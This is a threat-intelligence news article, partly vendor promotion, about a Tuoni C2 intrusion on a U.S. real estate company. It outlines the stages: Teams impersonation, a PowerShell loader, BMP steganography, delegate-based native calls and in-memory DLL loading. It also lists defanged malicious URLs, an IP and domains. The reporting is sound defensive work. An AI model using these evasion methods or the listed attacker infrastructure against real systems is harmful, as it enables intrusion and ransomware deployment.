In October 2025, Morphisec’s anti-ransomware prevention platform detected and neutralized a sophisticated cyberattack targeting a major U.S. real estate company.
The campaign showcased the emerging threat posed by the Tuoni C2 framework a free, modular command-and-control tool designed to deliver stealthy, in-memory payloads while evading traditional security defenses.
What made this attack particularly notable was the integration of AI-assisted code generation into the delivery mechanism, as evidenced by the use of scripted comments and the modular structure of the initial loader.
The incident underscores how threat actors are rapidly adopting advanced frameworks and leveraging artificial intelligence to enhance evasion capabilities, creating a formidable challenge for defenders relying on conventional endpoint protection.
The attack began in mid-October through what appears to be social engineering via Microsoft Teams impersonation.
Attackers posed as trusted vendors or colleagues to manipulate an employee into executing a malicious PowerShell one-liner, establishing the initial foothold.
The attacker’s entry point spawned a hidden PowerShell process that downloaded a secondary script from hxxp://kupaoquan[.]com/files/update-web-kupaoquan.com.ps1.
This stage employed an innovative evasion technique: steganography embedded within a seemingly innocuous BMP image file (bg-engine.bmp).
The downloaded script extracted hidden shellcode from the image’s pixel data using least significant bit (LSB) manipulation techniques.
Rather than using direct API calls that security tools monitor, the malware compiled inline C# and leveraged Marshal.GetDelegateForFunctionPointer to invoke native functions dynamically.
This delegation approach created an additional layer of indirection, allowing the payload to bypass signature-based detection mechanisms that traditional antivirus and endpoint detection and response solutions typically employ.
Once executed, the payload reflectively loads TuoniAgent.dll entirely in memory a technique that leaves minimal forensic traces on the filesystem.
Tuoni C2: A Rising Threat
Tuoni is a modular post-exploitation framework supporting HTTP, HTTPS, and SMB communications.
The framework offers extensive native commands for agent management and system manipulation, including automatic privilege escalation to SYSTEM level access.
Its heavy obfuscation with exports XOR-encoded and decoded only during reflective loading makes analysis challenging.
The threat actors’ configuration revealed the primary C2 server at 206.81.10[.]0, communicating through hxxp://kupaoquan[.]com. Threat intelligence analysis uncovered a secondary domain: udefined30[.]domainofhonour40.xyz.
The proliferation of Tuoni stems from its accessibility. As a free, well-documented framework with active development, it presents an attractive option for ransomware affiliates and other criminal groups seeking powerful post-exploitation capabilities without the cost of proprietary tools.
Prevention-First Strategy
Morphisec’s Automated Moving Target Defense (AMTD) technology detected and blocked the attack before the C2 listener could execute, preventing data exfiltration, ransomware deployment, and lateral movement.
This incident demonstrates why traditional EDR solutions prove insufficient against in–memory, reflective techniques an increasingly common tactic in advanced threat campaigns.
This attack reveals three essential lessons: First, Tuoni adoption will accelerate rapidly among threat actors. Second, AI-assisted delivery mechanisms combining steganography with dynamic delegation represent the new norm for sophisticated loaders.
Third, organizations must adopt prevention-first approaches capable of detecting threats before execution, as conventional AV and EDR solutions fail against these advanced evasion techniques.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.